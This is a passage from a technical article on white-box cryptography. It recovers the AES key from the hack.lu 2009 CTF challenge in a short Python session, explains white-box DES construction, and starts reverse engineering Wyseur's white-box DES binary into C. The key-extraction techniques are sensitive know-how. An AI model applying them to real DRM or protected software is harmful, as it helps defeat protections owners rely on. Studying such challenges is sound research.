But remember that a transposition is necessary to retrieve the subkey!

---------------------------------------------------------------------------
>>> P = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15] #I'm lazy :)
>>> S4 = []
>>> for i in xrange(16):
...     S4.insert(i,S2[P[i]])
---------------------------------------------------------------------------

    Now S4 holds the subkey K[0]. An interesting property of the AES key
schedule is that the subkey K[0] is equal to the key before derivation.
This is why our priority was to exploit the first round.

---------------------------------------------------------------------------
>>> s = 'hack.lu-2009-ctf'
>>> key = ''.join(map(lambda x: chr(x), S4))
>>> key
'\x14+\xbe\x0e-"\xe4\x80\x97I}_\xac[Y&'
>>> keyObj=AES.new(key)
>>> encPwd=keyObj.decrypt(s)
>>> encPwd.encode('hex').upper()
'192EF9E61164BD289F773E6C9101B89C'
---------------------------------------------------------------------------

    And the solution is the same as baboon's one [R03]. Of course there
were many other ways to proceed but it's useless to even consider them due
to the very weak nature of this 'WB'.


----[ 4.3 - Random thoughts


    Jb designed this challenge so that it could be solved in the 2-days
context of the hack.lu CTF. It's very likely that any reverser familiar
with the AES would be able to deal with it rather easily and so did baboon
at that time when he came up with a smart and quick solution [R03]. If Jb
had used the implementation described in [R07] then it would have been a
whole other game though still breakable [R05].

    That being said, this implementation (which is based on what is called
partial evaluation) may only be a toy cipher but it's perfect to introduce
more advanced concepts. Indeed several security measures (amongst others)
were voluntary missing:

    - ShiftRows() and MixColumns() were not modified. A strong
      implementation would have transformed them. Additionally SubBytes()
      could have been transformed in a less gentle manner to mitigate
      trivial attacks.

    - There is a direct correspondence between an obfuscated function and
      it's unprotected "normal" counterpart. Inputs and outputs of such
      functions are synchronized or you could say that intermediate states
      can be observed. "Internal encoding" removes this property.

    - The first and last rounds should have a special protection. This is
      because the input (respectively the output) of the first
      (respectively the last) round can be synchronized with the normal
      implementation. "External encoding" is used to prevent this but as a
      side effect alter the compatibility with the original encryption.

    - etc.

Remark: If you ever come across a WB implementation, let me give you 2 nice
tricks to see in the blink of an eye if it's potentially weak or not:

    - Look at the size of the implementation. Remember that the size of an
      obfuscated primitive is deeply related to the number and size of the
      lookup tables, the weight of the opcodes being generally negligible.
      In this case, the binary was 85 kB whereas the state of the art
      requires at least 770 kB. It was thus obvious that several
      obfuscation layers were missing.

    - The fully obfuscated version of the algorithms described in [R07]
      only uses XOR and substitutions (lookup tables) as MixColumns and
      ShiftRows are both transformed to make it possible. One may however
      point out that the statement holds with T-tables based
      implementations. It's true but such implementations use well known
      tables so it's easy to fingerprint them.

    Remember that real-life white-boxes (i.e. used in DRM, embedded
devices, etc.) are likely to be close to the state of the art (assuming
they are designed by crypto professionals and not by the average engineer
;)). Conversely, they may also face practical problematics (size, speed)
which have an impact on their security. This is especially true with
embedded devices.


--[ 5 - White-boxing the DES


    If you're still reading (hi there!) then it probably means that you
already have at least a basic knowledge of cryptography. So you know that
DES should not be used because of its short keylength (56 bits), right?
Then why the hell should we be focused on it? Well because:

    - There are only 2 public white-box design families: AES and DES
    - If you can white-box DES, then you can probably white-box 3DES as
      well (which is strong)
    - I couldn't find a non commercial sophisticated enough AES WB to play
      with and I don't want to be sued by M$, Adobe, etc. :D

Remark: While AES WB cryptanalysis are essentially algebraic, DES related
ones are statistical as you will soon find out.


----[ 5.1 - The DES algorithm


    DES is a so called Feistel cipher [R01] with a block size of 64 bits
and 16 rounds (r). First a permutation (IP) is applied to the input then
in each round a round-function is applied which splits its input in two 32
bits buffers L (Left) and R (Right) and applies the following equations
system:

    L(r+1) = R(r)
    R(r+1) = L(r) [+] f(R(r),K(r))

    With:
        0 <= r < 16
        [+] being the XOR operation

    The round function is described by the following scheme:

--------------------------- DES round function ----------------------------
 **********    **********
 *  L(r)  *    *  R(r)  *
 **********    **********
      |            |
    .------------- |
    | |            v                           .---------------------.
    | |     .-------------.                   / Linear transformation \
    | |      \   E-Box   /                   (       32b -> 48b        )
    | |       '---------'                     \                       /
    | |            |                           '---------------------'
    | |            v                                .------------.
    | |          .....        **********           / XOR operand  \
    | |          . + .<------ *  K(r)  *          (  2x48b -> 48b  )
    | |          .....        **********           \              /
    | |            /\                               '------------'
    | |           /  \
    | |          v    v                      .-------------------------.
    | |   .------.    .------.              / Non linear transformation \
    | |    \ S1 / ...  \ S8 /              (          using SBox         )
    | |     '--'        '--'                \        8x6b -> 8x4b       /
    | |         \      /                     '-------------------------'
    | |          \    /
    | |           v  v                          .---------------------.
    | |        .--------.                      / Linear transformation \
    | |        |  P-Box |                     (       32b -> 32b        )
    | |        '--------'                      \                       /
    | |            |                            '---------------------'
    | |          ..v..                              .------------.
    | '--------->. + .                             / XOR operand  \
    |            .....                            (  2x32b -> 32b  )
    |              |                               \              /
    v              v                                '------------'
 **********    **********
 * L(r+1) *    * R(r+1) *
 **********    **********
---------------------------------------------------------------------------

    When the 16 rounds are completed, the IP^-1() function is applied and
the result is called the ciphertext.

    While SBox and XOR are self explanatory, let me give you a few more
details about the linear transformations (E-Box and P-Box).


                                 The E-Box
                                 ---------


    The E-Box is used to extend a 32 bits state into a 48b one so that each
bit can be combined with a round-key bit using a XOR. To transform 32 bits
into 48 bits, 16 out of the 32 bits are duplicated. This is performed using
the following table:

                         32,  1,  2,  3,  4,  5,
                          4,  5,  6,  7,  8,  9,
                          8,  9, 10, 11, 12, 13,
                         12, 13, 14, 15, 16, 17,
                         16, 17, 18, 19, 20, 21,
                         20, 21, 22, 23, 24, 25,
                         24, 25, 26, 27, 28, 29,
                         28, 29, 30, 31, 32,  1

    For example, the first bit of output will the last bit of input (32)
and the second bit of output will be the first bit of input (1). In this
particular case the bit positions are written from 1 to 32. As you may have
noticed, the 16 bits from columns 3 and 4 are not duplicated. They are
called the middle bits, we will see later why they are important.


                                 The P-Box
                                 ---------


    The P-Box is a bit permutation which means that every bit of input will
have a new position in the output. Such a transformation is linear and can
be represented by a bit matrix. When combined with a XOR operation with a
constant, this is what we call an affine transformation (AT).


----[ 5.2 - An overview of DES WB primitives


    The first WB DES implementation was presented in [R09]. Explaining how
and why DES white-box were designed is not the most simple of the task
especially with an ASCII / 75 columns constraint ;> I'll try to focus on
the main mechanisms so that you can get a global picture with the next
section. At some point you may however feel lost. In that case, please read
the excellent [R15] <3


                           The protection of I/O
                          ---------------------


    The reverser is able to intercept every step of the algorithm as well
as to examine all the memory. This gives him a huge advantage as he can
easily trace all inputs and outputs of elementary functions of the WB.

    In the case of DES, this is even easier thanks to the very nature of
Feistel network. For example an attacker would easily locate the output of
the P-Box in round (r) because it is combined with part of the input: L(r).
To mitigate this, several transformations are performed:

    a) All elementary operations of the white-box are performed on 96 bits
       states. Let's try to understand why.

       Initially a native DES round begins which the 64 bits state
       L(r) || R(r). R(r) is then extended using the E-box to
       generate a 8x6 = 48 bits buffer and at the same time, L(r) and R(r)
       are still part of the internal state because they are still
       contributing to the round's operations:


                 **************    **************
                 *    L(r)    *    *     R(r)   *
                 **************    **************
                       |     .------------|  32b
                       |     |            v
                       |     |  .-------------------.
                   32b | 32b |  |       E-box       |
                       |     |  '-------------------'
                       |     |            |  48b
                       v     v            v
                      Mem1  Mem2         Mem3


       At this point the internal state is composed of 32 x 2 + 48 = 112
       bits which is the maximum required size before being shrunken to a
       64 bits state at the end of the round: L(r+1) || R(r+1). To avoid
       any information leak, a unique -constant size- state is used to hide
       the position of the bits.

       If you remember 5.1 paragraph, the E-Box is duplicating 16 out of
       the 32 bits of R(r). As a result, constructing 'Mem2' can be done
       extracting 16 bits out of R(r) and the 16 remaining ones out of
       'Mem3'. With this property, the internal state is composed of 96
       bits. Here is a diagram ripped from [R17] to understand how the
       primitive is modified to handle this 96 bits state:


                    32b               48b              16b
               ************** ********************* ********
    state 1:   *     L(r)   * *       X(r)        * * r(r) *
               ************** ********************* ********
                     |                |      |         |
                     |                v      |         |
                     | *********    .....    |         v
                     | * sK(r) *--> . + .    |    .-------.
                     | *********    .....    '-->(  Merge  )
                     |                |           '-------'
                     |                v               |
                     |         .-------------.        |
                     |          \     S     /         |
                     |           '---------'          |
                     |                |               |
                32b  v                v 32b     32b   v
               ************** *************** ***************
    state 2:   *    L(r)    * *    Y(r+1)   * *     R(r)    *
               ************** *************** ***************
                     |                  |           |
                     v                  |           |
                   .....    .--------.  |           |
                   . + .<---|    P   |<-'           |
                   .....    '--------'              |
                    |                               |
                32b '----------------------------------.
                                        |           |  |
                    .-------------------|-----------'  |
                    |               32b v              v 32b
                    |               .-------.       .------.
                    |              /  E-box  \     ( Select )
                    |  32b        '-----------'     '------'
                    |                   |              |
                    v               48b v              v 16b
               ************** ********************* ********
    state 3:   *   L(r+1)   * *       X(r+1)      * *r(r+1)*
               ************** ********************* ********

       With:
           - sK(r) being the subkey of round r
           - X(r) being the output of the E-box of round r-1
           - Y(r) being the output of the SBox of round r-1
           - r(r) being the complementary bits so that X(r) and r(r) is a
             duplication of R(r)

    b) Input and outputs between elementary operations are protected using
       what is called the "internal encodings". These encodings are applied
       to functions implemented as lookup tables.

       Let's take an example. You are chaining f() and g() which means that
       you are calculating the composition g() o f(). Obviously without any
       protection, an attacker can intercept the result of f() at debug
       time (e.g. by putting a breakpoint at the entry of g())

       Now if you want to protect it, you can generate a random bijection
       h() and replace f() and g() by F() and G() where:

           F() = h() o f()
           G() = g() o h()^-1

       Note: Again this is a mere example, we do not care about the
       {co}domain consideration.

       These functions are evaluated and then expressed as lookup tables.
       Obviously this will not change the output as:

           G() o F() = (g() o h()^-1) o (h() o f())
                     = g() o (h()^-1 o h()) o f()    [associativity]
                     = g() o f()

       But the difference is that intercepting the output of F() doesn't
       give the output of f(). Pretty cool trick, right?

       However I've just written that WB DES implementations were always
       manipulating 96 bits states. Then does it mean that we need lookup
       tables of 2^96 entries? No, this would be troublesome ;> We can use
       the so called "path splitting" technique.

       Consider the example of a 32 bits buffer. To avoid using a huge
       lookup table, you can consider that this buffer is an 8 bits array.
       Each element of the array will then be obfuscated using a
       corresponding 8 bits lookup table as described below:

                *****************************************
                *   IN[0] ||  IN[1] ||  IN[2] ||  IN[3] *
                *****************************************
                      |         |         |         |
                      |         |         |         |
                      v         v         v         v
                  .-------. .-------. .-------. .-------.
                  | 2^8 B | | 2^8 B | | 2^8 B | | 2^8 B |
                  '-------' '-------' '-------' '-------'
                      |         |         |         |
                      |         |         |         |
                      v         v         v         v
                *****************************************
                *  OUT[0] || OUT[1] || OUT[2] || OUT[3] *
                *****************************************

       I took the example of an 8 bits array but I could have used any
       size. Something really important to understand: the smaller the
       lookup table is, the more it will leak us information. Keep it in
       mind.

    c) Do you remember when I said that a WB implementation was the exact
       implementation of the corresponding crypto primitive? Well it's not
       true. Or you could say that I was simplifying things ^_~

       Most of the time (in real life), WB_DES() is a G() o DES() o F()
       where F() and G() are encoding functions. So the first input
       (plaintext) and the last output (ciphertext) may be obfuscated as
       well. This is called an "external encoding" and this is used to
       harden the white-box implementation. Indeed if there were no such
       functions, first & last rounds would be weaker than other rounds.
       This 'academic' protection aims at preventing trivial key recovery
       attacks. A WB implementation without external encoding is said to be
       'naked'.

       In the context of real life protections, it may (or may not) be
       associated with an additional layer to protect the I/O before &
       after the encryption. It would be bad to intercept the plaintext
       once decrypted, right? Commercial protections almost never use
       native implementations for (at least) this reason. Intercepting a
       plaintext is indeed far easier than recovering the encryption key.

       In the WB DES case, common academic designs use affine functions,
       encoded or not.


                         Transforming DES functions
                         --------------------------


    Now that we've had an overview of how I/O were protected between
elementary functions, let's see how we can build said functions.

    a) The partial evaluation

    This is probably the most intuitive part of the WB implementation. This
is about 'fusing' the S-Boxes with the round-keys. This is exactly what was
performed in the previous AES challenge. If you can remember, this is also
the first example that I gave at the beginning of the paper to introduce
the white-boxing concept.

    Using the previous diagram, it means that we want to convert this step:

                    32b               48b              16b
               ************** ********************* ********
               *     L(r)   * *       X(r)        * * r(r) *
               ************** ********************* ********
                      |               |      |         |
                      |               v      |         |
                      |   ******    .....    |         v
                      |   * sK *--> . + .    |    .-------.
                      |   ******    .....    '-->(  Merge  )
                      |               |           '-------'
                      |               v               |
                      |        .-------------.        |
                      |         \     S     /         |
                      |          '---------'          |
                      |               |               |
                32b   v               v 32b     32b   v
               ************** *************** **************
               *    L(r)    * *    Y(r+1)   * *    R(r)    *
               ************** *************** **************

    into this one:


               *********************************************
               *          state 1 (12 x 8 = 96 bits)       *
               *********************************************
                  |      |      |                       |
                  v      v      v                       v
               .-----..-----..-----.                 .-----.
               | T0  || T1  || T2  |       ...       | T11 |
               '-----''-----''-----'                 '-----'
                  |      |      |                       |
                  v      v      v                       v
               *********************************************
               *              state 2 (96 bits)            *
               *********************************************


    A lookup table Ti (mapping a byte to a byte) is called a 'T-Box'. There
    are two types of T-Box because of the heterogeneity of the operations
    performed on the state:

       - The non neutral T-box. They are the 8 T-boxes involved with the
         Sbox and the XOR. Each of them is concealing an Sbox and a subkey
         mixing.

             input:
                      -> 6 bits from X(r) to be mixed with the subkey
                      -> 1 bit from L(r) or r(r)
                      -> 1 bit from L(r) or r(r)
             output:
                      -> 4 bits from the Sbox
                      -> 2 bits from X(r) taken from the input before being
                         mixed with the subkey
                      -> 1 bit from L(r) or r(r)
                      -> 1 bit from L(r) or r(r)

       - The neutral T-box which are only used to connect bits of state 1
         to bits of state 2. For example the bits of L(r) are never
         involved in any operation between state 1 and state 2.

             input:
                      -> 1 bit from L(r) or r(r)
                      -> 1 bit from L(r) or r(r)
                        [...]
                      -> 1 bit from L(r) or r(r)
             output:
                      -> the input (permuted)

    Keep in mind that in each case, you have a 'nibble view' of both inputs
    and outputs. Moreover, permutations are used to make harder the
    localization of Sbox upon a simple observation. To have a better
    understanding of this point as well as associated security explanations
    I recommend to read [R09].

    b) The AT transformation

    We now want to transform this:


               ************** *************** ***************
    state 2:   *    L(r)    * *    Y(r+1)   * *     R(r)    *
               ************** *************** ***************
                     |                  |           |
                     v                  |           |
                   .....    .--------.  |           |
                   . + .<---|    P   |<-'           |
                   .....    '--------'              |
                    |                               |
                32b '----------------------------------.
                                        |           |  |
                    .-------------------|-----------'  |
                    |               32b v              v 32b
                    |               .-------.       .------.
                    |              /  E-box  \     ( Select )
                    |  32b        '-----------'     '------'
                    |                   |              |
                    v               48b v              v 16b
               ************** ********************* ********
    state 3:   *   L(r+1)   * *       X(r+1)      * *r(r+1)*
               ************** ********************* ********

    into this:

               *********************************************
               *              state 2 (96 bits)            *
               *********************************************
                  |      |      |                       |
                  v      v      v          ...          v

               ?????????????????????????????????????????????

                  |      |      |          ...          |
                  v      v      v                       v
               *********************************************
               *              state 3 (96 bits)            *
               *********************************************


    To put it simply, and as said earlier, the combination of the P-Box and
the following XOR is an affine function. Because we want to use lookup
tables to implement it we will have to use a matrix decomposition.

    Let's take an example. You want to protect a 8x8 bit-matrix
multiplication. This matrix (M) can be divided into 16 2x2 submatrix as
shown below:

           .----.     .----.----.----.----.     .----.
           | Y0 |     | A  | B  | C  | D  |     | X0 |
           .----.     .----.----.----.----.     '----'
           | Y1 |     | E  | F  | G  | H  |     | X1 |
           .----.  =  .----.----.----.----.  x  .----.
           | Y2 |     | I  | J  | K  | L  |     | X2 |
           .----.     .----.----.----.----.     .----.
           | Y3 |     | M  | N  | O  | P  |     | X3 |
           '----'     '----'----'----'----'     '----'

          Vector Y          Matrix M           Vector X

    Here the Yi and Xi are 2 bits sub-vectors while A,B,C,etc. are 2x2
bit-submatrix. Let's focus on Y0, you can write:

    Y0 = A*X0 [+] B*X1 [+] C*X2 [+] D*X3

    Because A,B,C and D are constants it's possible to evaluate the
multiplications and build the corresponding lookup tables (Li). This gives
the following diagram:

            ******    ******    ******    ******
            * X0 *    * X1 *    * X2 *    * X3 *
            ******    ******    ******    ******
              |          |         |         |
              v          v         v         v
            .----.    .----.    .----.    .----.
            | L0 |    | L1 |    | L3 |    | L4 |
            '----'    '----'    '----'    '----'
               |         |         |         |
               |  .....  |         |  .....  |
               '->. + .<-'         '->. + .<-'
                  .....               .....
                    |                   |
                    |       .....       |
                    '------>. + .<------'
                            .....
                              |
                              v
                            ******
                            * Y0 *
                            ******

    You may object (and you would be right) that information is still
leaking and that it would be easy to retrieve the original matrix. Well
it's true. Thus to avoid this kind of situation two techniques are used:

    - Each XOR operation is hidden inside a lookup table. In our example,

      the resulting lookup tables have 2^(2x2) = 16 entries and 2^2 = 4
      outputs (hence a size of 4x16 = 64 bits).

    - Internal encoding (remember the previous explanations) is used to
      protect the I/O between the lookup tables.

    Our matrix multiplication becomes:

     ******  ******    ******  ******
     * X0 *  * X1 *    * X2 *  * X3 *
     ******  ******    ******  ******

        |      |          |       |
        v      v          v       v

        2b    2b          2b     2b
      <----><---->      <----><---->
      .----------.      .----------.
       \   S0   /        \   S1   /
        '------'          '------'
         <---->            <---->
           2b                2b

                \         /
                 \       /
                  |     |
                  v     v

                  2b    2b
                <----><---->
                 .---------.
                 \   S2   /
                  '------'
                   <---->
                     2b

                      |
                      v

                   ******
                   * Y0 *
                   ******

    This is called an 'encoded network'. The main side effect of this
construction is the important number of lookup tables required.


--[ 6 - Breaking the second case: Wyseur's challenge


----[ 6.1 - Reverse engineering of the binary


    As far as I can tell, there is an obvious need to rewrite the binary as
C code because:

        - We need to understand exactly what's going on from a mathematical
          point of view and C is more suitable than ASM for that purpose

        - Rewriting the functions will allow us to manipulate them easily
          with our tools. This is not mandatory though because we could
          be using debugging functions on the original binary itself.

    Again I won't detail all the reverse engineering process because this
is neither the main topic nor very hard anyway compared to what you may
find in the wild (in commercial protections).


                           High level overview
                           --------------------


    Let's begin by running the executable:

---------------------------------------------------------------------------
$ ./wbDES.orig
Usage: ./wbDES.orig <INPUT>
Where <INPUT> is an 8-byte hexadecimal representation of the input to be
encrypted
Example: ./wbDES.orig 12 32 e7 d3 0f f1 29 b3
---------------------------------------------------------------------------

    OK so we need to provide the 8 bytes of the plaintext as separate
arguments in the command line. Hum, weird but OK. When the binary is
executed, the first thing performed is a conversion of the arguments
because obviously a suitable buffer for cryptographic operations is
necessary. The corresponding instructions were rewritten as the following
C function:

---------------------------------------------------------------------------
// I even emulated a bug, will you find it? ;>
inline void convert_args(char **argv)
{
    int i = 0;                  // ebp-50h

    while(i <= 7)
    {
        char c;
        c = argv[1+i][0];

        if(c <= '9')
        {
            c -= '0';          // 0x30 = integer offset in ASCII table
            in[i] = (c<<4);
        }
        else
        {
            c -= ('a' - 10);
            in[i] = (c<<4);
        }

        c = argv[1+i][1];

        if(c <= '9')
        {
            c -= '0';        // 0x30 = integer offset in ASCII table
            in[i] ^= c;
        }
        else
        {
            c -= ('a' - 10);
            in[i] ^= c;
        }
        i++;
    }
    return;
}
---------------------------------------------------------------------------

    Once the job is done, an 8 bytes buffer (in[8], the plaintext) is
built. This is where serious business begins. Thanks to the Control Flow
Graph provided by your favorite disassembler, you will quickly identify 3
pseudo functions* :

    - wb_init(): 0x0804863F to 0x08048C1D

      This code takes an 8 bytes buffer, returns 1 byte and is called 12
      times by main(). Thanks to this, a 12 x 8 = 96 bits buffer is built.
      As said earlier, the WB is operating on 96 bits states so this is
      most likely the initialization function.

    - wb_round(): 0x08048C65 to 0x08049731

      This code takes the 12 bytes buffer generated by wb_init() as input
      and modifies it. The function is called 16 times by main(). Because
      16 is exactly the number of DES rounds, assuming it is the round
      function seems fair.

    - wb_final(): 0x08049765 to 0x08049E67

      This code takes the last buffer returned by wb_round() as input and
      returns an 8 bytes buffer which is printed on the screen. So we can
      assume that this is the termination function in charge of building
      the DES ciphertext out of the last internal state.

*: There is no 'function' in this program, probably because of an inlining,
but we can still distinguish logical parts.

    You may argue that attributing roles to wb_init, wb_round and wb_final
is a bit hasty but there is something interesting in the code: symbols! In
each of these functions, an array of lookup tables is used and named
'Initialize', 'RoundAffineNetwork' and 'FinalRoundNetwork' in the
corresponding functions. Convenient isn't it?

    Usually in commercial protections, engineers will take care of little
details such as this and try to avoid leaking any information. In this case
however, it can be assumed that the focus is on the cryptography as there
are neither anti-debugs nor anti-disassembling protections so it should be
safe to trust our intuition.

    Thanks to this first reverse engineering step, we're able to rewrite
a similar main function:

-------------------------------- wb_main.c --------------------------------
unsigned char in[8];            // ebp-1Ch
unsigned char out[12];          // ebp-28h
unsigned char temp[12];         // ebp-34h

[...]

int main(int argc, char **argv)
{
    if( argc != 9)
    {
        printf(usage, argv[0], argv[0]);
        return 0;
    }

    /* Fill the in buffer */

    convert_args(argv);

    /* and print it :) */

    printf("\nINPUT:    ");
    for(j=0; j<8; j++)
        printf("%02x ", in[j]);

    /* WB initialisation */

    for(j=0; j<12; j++)
        wb_init(j);

    round_nbr = 0;
    for(round_nbr=0; round_nbr<15; round_nbr++)
    {
        memcpy(temp, out, 12);
        wb_round();
    }

    /* Building the final buffer */

    printf("\nOUTPUT:   ");
    for(j=0; j<8; j++)
        wb_final(j);

    printf("\n");
    return 0;
}
-------------------------------- wb_main.c --------------------------------

    One hint to speed up things: always focus first on the size and nature
of buffers transmitted to the different sub-functions.


                            Reversing wb_init()
                            -------------------


    It is now time to have a look at the first function. Again I won't
detail the whole reverse engineering but rather give you a few
explanations:

    - Whenever the function is called, it uses a set of 15 lookup tables
      whose addresses are dependent of both the index in the output array
      and the index of the box itself (amongst the 15 used by the
      function).

      This means that the sets of tables used to calculate OUT[x] and
      OUT[y] when x!=y are (likely to be) different and for a same OUT[x],
      different tables will be applied to IN[a] and IN[b] if a!=b.

    - All of these lookup tables are located at:

          Initialize + 256*idx_box + OUT_idx*0xF00
          where:
              > idx_box is the index of the box amongst the 15
              > OUT_idx is the index in the output array (OUT)

    - The tables are static. Thanks to this property we can dump them
      whenever we want. I chose to write a little GDB script (available in
      appendix) to perform this task. The export is an array of lookup
      tables (iBOX_i) written in C language.

    - wb_init() is performing operations on nibbles (4 bits) so for a
      particular output byte (OUT[m]), the generation of the 4 least
      significant bits is independent of the generation of the 4 most
      significant ones.

    Now with this information in mind, let's have a look at the reversed
wb_init() function:

-------------------------------- wb_init.c --------------------------------
unsigned char p[8];

inline void wb_init(
    int m       // ebp-48h
)
{
    unsigned int temp0; // ebp-228h
    unsigned int temp1; // ebp-224h
    [...]
    unsigned int temp23; // ebp-1CCh

    unsigned int eax,ebx,ecx,edx,edi,esi;

    bzero(p,sizeof p);
    p[0] = iBOX_0[m][in[0]];
    p[1] = iBOX_1[m][in[1]];
    p[2] = iBOX_2[m][in[2]];
    p[3] = iBOX_3[m][in[3]];
    p[4] = iBOX_4[m][in[4]];
    p[5] = iBOX_5[m][in[5]];
    p[6] = iBOX_6[m][in[6]];
    p[7] = iBOX_7[m][in[7]];

    // First nibble

    ecx = (0xF0 & p[0]) ^ ( p[1] >> 4 );
    temp3 = 0xF0 & iBOX_8[m][ecx];

    ecx = (0xF0 & p[2]) ^ ( p[3] >> 4 );
    eax = iBOX_9[m][ecx] >> 4;
    ecx = temp3 ^ eax;
    temp6 = 0xF0 & iBOX_12[m][ecx];

    ecx = (0xF0 & p[4]) ^ ( p[5] >> 4 );
    eax = iBOX_10[m][ecx] >> 4;
    ecx = temp6 ^ eax;
    edi = 0xF0 & iBOX_13[m][ecx];

    ecx = (0xF0 & p[6]) ^ ( p[7] >> 4 );
    eax = iBOX_11[m][ecx] >> 4;
    ecx = edi ^ eax;
    edx = iBOX_14[m][ecx];
    esi = edx & 0xFFFFFFF0;

    // Second nibble

    ecx = (0x0F & p[1]) ^ (0xF0 & ( p[0] << 4 ));
    temp15 = 0xF0 & ( iBOX_8[m][ecx] << 4);

    ecx = (0x0F & p[3]) ^ (0xF0 & ( p[2] << 4 ));
    eax = 0x0F & ( iBOX_9[m][ecx] );
    ecx = temp15 ^ eax;
    temp18 = 0xF0 & ( iBOX_12[m][ecx] << 4 );

    ecx = (0x0F & p[5]) ^ (0xF0 & ( p[4] << 4 ));
    eax = 0x0F & iBOX_10[m][ecx];
    ecx = temp18 ^ eax;
    temp21 = 0xF0 & (iBOX_13[m][ecx] << 4);

    ecx = (0x0F & p[7]) ^ (0xF0 & ( p[6] << 4 ));
    eax = 0x0F & ( iBOX_11[m][ecx] );
    ecx = temp21 ^ eax;
    eax = 0x0F & ( iBOX_14[m][ecx] );

    // Output is the combination of both nibbles

    eax = eax ^ esi;
    out[m] = (char)eax;
    return;
}
-------------------------------- wb_init.c --------------------------------

    In a nutshell:
        - & (AND) and >>/<< (SHIFTS) are used to operate on nibbles
        - ^ (XOR) are used to concatenate nibbles in order to build the
          entries (which are bytes) of the iBOX_i lookup tables
        - The output byte out[m] is the concatenation of two independently
          calculated nibbles

    To understand exactly what's going on, a drawing is much clearer. So
thanks to asciio [R11] this gives us something like this:


 ******** ********  ******** ********  ******** ********  ******** ********
 * IN_0 * * IN_1 *  * IN_2 * * IN_3 *  * IN_4 * * IN_5 *  * IN_6 * * IN_7 *
 ******** ********  ******** ********  ******** ********  ******** ********

    |        |          |       |          |       |          |        |
  H |      H |        H |     H |        H |     H |        H |      H |
    v        v          v       v          v       v          v        v

 <----------------------------- 8x8 = 64 bits --------------------------->

.-------..-------. .-------..-------. .-------..-------. .-------..-------.
\iBox_0 /\iBox_1 / \iBox_2 /\iBox_3 / \iBox_4 /\iBox_5 / \iBox_6 /\iBox_7 /
 '-----'  '-----'   '-----'  '-----'   '-----'  '-----'   '-----'  '-----'

  <----------------------------- 8x4 = 32 bits ------------------------->

    \        /         \        /         \        /          \       /
   H \      / H       H \      / H       H \      / H        H \     / H
      v    v             v    v             v    v              v   v
   .---------.         .---------.        .---------.        .---------.
   \ iBox_8  /         \ iBox_9  /        \ iBox_10 /        \ iBox_11 /
    '-------'           '-------'          '-------'          '-------'

     <------------------------- 4x4 = 16 bits ---------------------->

          \              /                       \             /
        H  \            /  H                   H  \           /  H
            \          /                           \         /
             v        v                             v       v
             .---------.                           .---------.
             \ iBox_12 /                           \ iBox_13 /
              '-------'                             '-------'

                <--------------- 2x4 = 8 bits ----------->

                     \                               /
                      \    H                  H     /
                       '---------.       .---------'
                                 |       |
                                 v       v
                                .---------.
                                \ iBox_14 /
                                 '-------'

                               <- 1x4 bits ->

                                     \
                                    H \           8 bits
                                       \       <--------->
                   Concatenation        '--->  ***********
                    of nibbles                 *  OUT_x  *
                                        .--->  ***********
                                       /
                                    L /
                                     /

                               <- 1x4 bits ->

                                 .-------.
                                / iBox_14 \
                                '---------'
                                ^        ^
                          L     |        |    L
                       .--------'        '--------.
                      /                            \
                     /                              \

                <--------------- 2x4 = 8 bits ----------->

              .-------.                             .-------.
             / iBox_12 \                           / iBox_13 \
             '---------'                           '---------'

             ^        ^                             ^       ^
            /          \                           /         \
        L  /            \  L                   L  /           \ L
          /              \                       /             \

     <------------------------- 4x4 = 16 bits ---------------------->

    .-------.           .-------.          .-------.          .-------.
   / iBox_8  \         / iBox_9  \        / iBox_10 \        / iBox_11 \
   '---------'         '---------'        '---------'        '---------'

      ^    ^             ^    ^             ^    ^              ^   ^
   L /      \ L       L /      \ L       L /      \ L        L /     \ L
    /        \         /        \         /        \          /       \

  <----------------------------- 8x4 = 32 bits ------------------------->

 .-----.  .-----.   .-----.  .-----.   .-----.  .-----.   .-----.  .-----.
/iBox_0 \/iBox_1 \ /iBox_2 \/iBox_3 \ /iBox_4 \/iBox_5 \ /iBox_6 \/iBox_7 \
'-------''-------' '-------''-------' '-------''-------' '-------''-------'

<----------------------------- 8x8 = 64 bits --------------------------->

    ^        ^          ^       ^          ^       ^          ^        ^
  L |      L |        L |     L |        L |     L |        L |      L |
    |        |          |       |          |       |          |        |

 ******** ********  ******** ********  ******** ********  ******** ********
 * IN_0 * * IN_1 *  * IN_2 * * IN_3 *  * IN_4 * * IN_5 *  * IN_6 * * IN_7 *
 ******** ********  ******** ********  ******** ********  ******** ********

    In this case, 'H' is used as a suffix to identify the most significant
(High) nibble of a particular byte. As you can see, the input (respectively
the output) is not an 8 (respectively 12) _bytes_ array but rather a 16
(respectively 24) _nibbles_ array. Indeed, each byte array (iBox_i) stores
exactly 2 lookup tables. We say that such lookup tables are 'compacted',
see [R14] for additional details.


                            Global description
                            -------------------


    Good news guys, the wb_init(), wb_round() and wb_final() functions are
composed of the same nibble oriented patterns. So basically wb_round() and
wb_final() contain also AT applied to a nibbles array and the end of the
reverse engineering is quite straightforward.

Remark: Manipulating nibbles implies that the internal encoding is
performed using 4 bits to 4 bits bijections.

    Again thanks to asciio, we're able to draw something like that:


                   8 x (2x4) = 64 bits
          <---------------------------------->

           2x4 = 8 bits
             <---->

          .----------------------------------.             .-----------.
          | .-----. .-----.          .-----. |             |   INPUT   |
       .----| IN0 | | IN1 |   ...    | IN7 | |             '-----------'
       |  | '-----' '-----'          '-----' |                    |
       v  '------------|----------------|----'                    v
       |               v                |                  .------------.
       |--------<---------------<-------'                 ( wb_init func )
       |                                                   '------------'
 .-----v---------------------------------------------.            |
 |.--------. .--------.                   .---------.|            |
 || STG0_0 | | STG0_1 |       ...         | STG0_11 ||            |
 |'--------' '--------'                   '---------'|            |
 '-----|---------|-----------------------------|-----'            |
       |         |                             |                  v
       |         v                             |           .-------------.
       |         |                             |          ( wb_round func )
       '--->-----|-------<---------------------'           '-------------'
                 |                                                |
 .---------------|------------------------------------.           |
 |.--------. .---v----.                    .---------.|           |
 || STG1_0 | | STG1_1 |       ...          | STG1_11 ||           |
 |'--------' '--------'                    '---------'|           |
 '----------------------------------------------------'           |
                                                                  |
    2x4bits                                                       |
  <-------->      12 x (2x4) = 96 bits                            |
 <---------------------------------------------------->           |
                                                                  v
                                                           .-------------.
                              ...                     15x ( wb_round func )
                                                           '-------------'
 .----------------------------------------------------.           |
 |.---------..---------.                  .----------.|           |
 || STG14_0 || STG14_1 |      ...         | STG14_11 ||           |
 |'---------''---------'                  '----------'|           |
 '-----|--------|-------------------------------|-----'           v
       |        v                               |          .-------------.
       |        |                               |         ( wb_final func )
       '----->-----<----------------------------'          '-------------'
